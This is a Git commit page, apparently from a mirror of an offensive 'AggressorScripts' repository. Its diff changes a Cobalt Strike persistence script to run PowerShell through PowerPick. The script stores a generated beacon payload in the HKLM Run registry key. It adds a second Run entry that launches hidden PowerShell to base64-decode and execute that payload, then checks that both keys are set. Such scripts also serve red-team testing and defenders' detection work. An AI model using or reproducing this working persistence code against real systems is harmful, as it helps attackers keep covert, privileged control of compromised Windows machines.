infosecn1nja
/
AggressorScripts
mirror of https://github.com/infosecn1nja/AggressorScripts.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated with PowerPick

Execute-Assembly
Harley Lebeau 2018-02-09 12:26:55 -07:00 committed by GitHub
parent 5dad6bd0b5
commit 74549b9ad3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
Persistence/HKLMRunKeyPSRegistryPersist.cna
View File

@ -23,16 +23,16 @@ sub persistRegistryHKLM {
else { else {
$data = payloadgenerate($bid); $data = payloadgenerate($bid);
$powershellcmd = "Set-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."' -Type String -Value \"".$data."\""; $powershellcmd = "Set-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."' -Type String -Value \"".$data."\"";
bpowershell!($bid, $powershellcmd); bpowerpick!($bid, $powershellcmd);
blog($bid, "\cBSetting the first HKLM Run Key Value as '".$3['keyname']."'..."); blog($bid, "\cBSetting the first HKLM Run Key Value as '".$3['keyname']."'...");
$powershellcmd1 = "Set-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."' -Value 'C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -c (IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((gp HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run ".$3['keyname'].").".$3['keyname']."))))'"; $powershellcmd1 = "Set-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."' -Value 'C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -c (IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((gp HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run ".$3['keyname'].").".$3['keyname']."))))'";
bpowershell!($bid, $powershellcmd1); bpowerpick!($bid, $powershellcmd1);
blog($bid, "\cBSetting the second HKLM Run Key Value as '".$3['keyname1']."'..."); blog($bid, "\cBSetting the second HKLM Run Key Value as '".$3['keyname1']."'...");
blog($bid, "\cBDisplaying both Run Keys to Verify everything worked as intended..."); blog($bid, "\cBDisplaying both Run Keys to Verify everything worked as intended...");
$powershellcmd2 = "Get-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."'"; $powershellcmd2 = "Get-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."'";
bpowershell!($bid, $powershellcmd2); bpowerpick!($bid, $powershellcmd2);
$powershellcmd3 = "Get-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."'"; $powershellcmd3 = "Get-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."'";
bpowershell!($bid, $powershellcmd3); bpowerpick!($bid, $powershellcmd3);
} }
})); }));